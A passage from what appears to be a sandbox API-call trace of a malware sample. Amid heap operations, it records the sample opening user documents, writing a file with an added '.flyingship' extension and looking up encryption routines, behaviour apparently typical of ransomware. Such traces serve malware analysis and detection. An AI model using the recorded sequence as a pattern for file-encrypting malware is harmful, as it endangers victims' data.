(HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0177.388] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0177.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0177.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0177.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\8kaz.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0177.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0177.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0177.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0177.407] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.407] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xd070, lpOverlapped=0x0) returned 1 [0177.415] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0177.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd070) returned 0xbea018 [0177.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0177.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd070) returned 0xbf7090 [0177.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0177.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd070) returned 0xbea018 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0177.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.418] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd070) returned 0xbea018 [0177.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0177.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd070) returned 0xa5f008 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.421] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0177.421] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.422] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0177.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.422] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.423] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.424] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.424] 